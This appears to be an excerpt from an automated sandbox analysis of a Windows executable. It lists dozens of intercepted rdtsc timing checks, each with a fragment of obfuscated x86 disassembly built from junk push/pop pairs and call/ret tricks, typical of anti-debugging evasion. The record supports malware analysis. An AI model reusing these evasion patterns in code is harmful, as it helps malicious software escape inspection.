            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C47EA second address: 4C47F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C47F0 second address: 4C47F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C47F4 second address: 4C4802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C4802 second address: 4C4806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499292 second address: 4992BC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F466483F646h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F466483F646h 0x00000014 jmp 00007F466483F656h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4992BC second address: 4992C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD7B0 second address: 4CD7B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD7B9 second address: 4CD7D2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4664873C1Bh 0x00000008 jmp 00007F4664873C0Fh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD951 second address: 4CD957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD957 second address: 4CD95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEDA second address: 4CDEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEE7 second address: 4CDEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEED second address: 4CDEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEF1 second address: 4CDEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDEF7 second address: 4CDF03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F466483F646h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDF03 second address: 4CDF13 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4664873C06h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDF13 second address: 4CDF19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDF19 second address: 4CDF1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CEEC6 second address: 4CEECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF70A second address: 4CF714 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4664873C0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF714 second address: 4CF720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF720 second address: 4CF726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF726 second address: 4CF72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CF72B second address: 4CF730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D99FD second address: 4D9A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9A03 second address: 4D9A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F4664873C08h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA40A second address: 4DA41B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F466483F64Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA41B second address: 4DA44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F4664873C0Ch 0x0000000f jmp 00007F4664873C0Eh 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push edi 0x0000001c jp 00007F4664873C06h 0x00000022 pop edi 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA859 second address: 4DA85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA85E second address: 4DA881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4664873C15h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA881 second address: 4DA886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB666 second address: 4DB66D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DBB7F second address: 4DBBDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F466483F646h 0x0000000a popad 0x0000000b pop edx 0x0000000c mov dword ptr [esp], eax 0x0000000f mov di, A979h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F466483F648h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov di, A3DAh 0x00000033 push 00000000h 0x00000035 sub dword ptr [ebp+122D390Fh], ecx 0x0000003b xchg eax, ebx 0x0000003c push edx 0x0000003d jmp 00007F466483F655h 0x00000042 pop edx 0x00000043 push eax 0x00000044 jc 00007F466483F650h 0x0000004a pushad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC584 second address: 4DC589 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC589 second address: 4DC593 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F466483F64Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC593 second address: 4DC59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DC59F second address: 4DC5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF19D second address: 4DF1A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF1A1 second address: 4DF1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F466483F656h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF1BD second address: 4DF1DF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F4664873C19h 0x00000008 pop ecx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF1DF second address: 4DF1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF7DE second address: 4DF84E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a js 00007F4664873C1Fh 0x00000010 jmp 00007F4664873C19h 0x00000015 push eax 0x00000016 jmp 00007F4664873C14h 0x0000001b pop eax 0x0000001c popad 0x0000001d nop 0x0000001e push esi 0x0000001f pop edi 0x00000020 push 00000000h 0x00000022 stc 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push esi 0x00000028 call 00007F4664873C08h 0x0000002d pop esi 0x0000002e mov dword ptr [esp+04h], esi 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc esi 0x0000003b push esi 0x0000003c ret 0x0000003d pop esi 0x0000003e ret 0x0000003f xchg eax, ebx 0x00000040 jbe 00007F4664873C10h 0x00000046 push eax 0x00000047 push edx 0x00000048 push ebx 0x00000049 pop ebx 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0346 second address: 4E034B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E009D second address: 4E00A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E034B second address: 4E0356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F466483F646h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0CFF second address: 4E0D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4664873C0Bh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7D26 second address: 4E7D30 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F466483F646h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7D30 second address: 4E7DB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F4664873C08h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2176h], ebx 0x0000002c clc 0x0000002d push 00000000h 0x0000002f pushad 0x00000030 pushad 0x00000031 sub dword ptr [ebp+122D19D5h], edi 0x00000037 mov dword ptr [ebp+12451707h], eax 0x0000003d popad 0x0000003e mov edi, 152C8120h 0x00000043 popad 0x00000044 push 00000000h 0x00000046 jmp 00007F4664873C17h 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F4664873C14h 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7DB9 second address: 4E7DC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F466483F646h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8D6C second address: 4E8D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4664873C18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F4664873C10h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EAC1C second address: 4EAC37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F64Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jng 00007F466483F64Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7EDA second address: 4E7EDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9DEC second address: 4E9DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7EDF second address: 4E7EE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8EEF second address: 4E8F8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F654h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jmp 00007F466483F64Bh 0x00000010 nop 0x00000011 jl 00007F466483F64Ch 0x00000017 xor dword ptr [ebp+122D1BB0h], ebx 0x0000001d push dword ptr fs:[00000000h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F466483F648h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 mov eax, dword ptr [ebp+122D019Dh] 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F466483F648h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 0000001Dh 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 push FFFFFFFFh 0x00000067 mov di, D820h 0x0000006b push eax 0x0000006c pushad 0x0000006d push edi 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECD2A second address: 4ECD38 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4664873C06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECD38 second address: 4ECD9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jno 00007F466483F652h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F466483F648h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 jbe 00007F466483F64Bh 0x0000002f mov ebx, 78480D25h 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 mov dx, ax 0x0000003a mov dword ptr [ebp+1247BCE4h], ecx 0x00000040 popad 0x00000041 push 00000000h 0x00000043 push edi 0x00000044 jnp 00007F466483F64Ch 0x0000004a jne 00007F466483F646h 0x00000050 pop ebx 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDE03 second address: 4EDE92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F4664873C19h 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a mov bx, 81CAh 0x0000001e push 00000000h 0x00000020 or dword ptr [ebp+122D2F7Fh], esi 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F4664873C08h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000016h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 mov dword ptr [ebp+122D1886h], eax 0x00000048 call 00007F4664873C19h 0x0000004d mov dword ptr [ebp+1245BDE1h], edx 0x00000053 pop edi 0x00000054 push eax 0x00000055 jc 00007F4664873C12h 0x0000005b jc 00007F4664873C0Ch 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ECFD8 second address: 4ECFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDFD9 second address: 4EDFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EDFDD second address: 4EDFE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F12E1 second address: 4F12EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4664873C0Ah 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3183 second address: 4F3189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F3189 second address: 4F31D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, esi 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F4664873C08h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 pushad 0x00000028 mov dword ptr [ebp+1246D797h], edx 0x0000002e movsx ecx, dx 0x00000031 popad 0x00000032 push 00000000h 0x00000034 mov edi, 311901EBh 0x00000039 push eax 0x0000003a jc 00007F4664873C14h 0x00000040 push eax 0x00000041 push edx 0x00000042 ja 00007F4664873C06h 0x00000048 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F5145 second address: 4F51C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F466483F651h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jnp 00007F466483F64Ch 0x00000010 mov edi, dword ptr [ebp+122D2F1Dh] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebp 0x0000001b call 00007F466483F648h 0x00000020 pop ebp 0x00000021 mov dword ptr [esp+04h], ebp 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebp 0x0000002e push ebp 0x0000002f ret 0x00000030 pop ebp 0x00000031 ret 0x00000032 mov dword ptr [ebp+122D3103h], ebx 0x00000038 push 00000000h 0x0000003a jmp 00007F466483F655h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 jmp 00007F466483F653h 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F51C3 second address: 4F51C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F51C8 second address: 4F51CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F89ED second address: 4F89F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F89F3 second address: 4F8A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8A00 second address: 4F8A06 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FDF9B second address: 4FDF9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE24D second address: 4FE251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE251 second address: 4FE26D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F466483F651h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FE3D0 second address: 4FE3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4664873C14h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4664873C0Ch 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AE5D second address: 49AE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AE63 second address: 49AE67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AE67 second address: 49AE6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070FD second address: 507102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507102 second address: 507116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507116 second address: 507160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F4664873C0Eh 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push edi 0x00000013 jbe 00007F4664873C06h 0x00000019 pop edi 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jne 00007F4664873C06h 0x00000023 popad 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4664873C15h 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50730E second address: 507312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
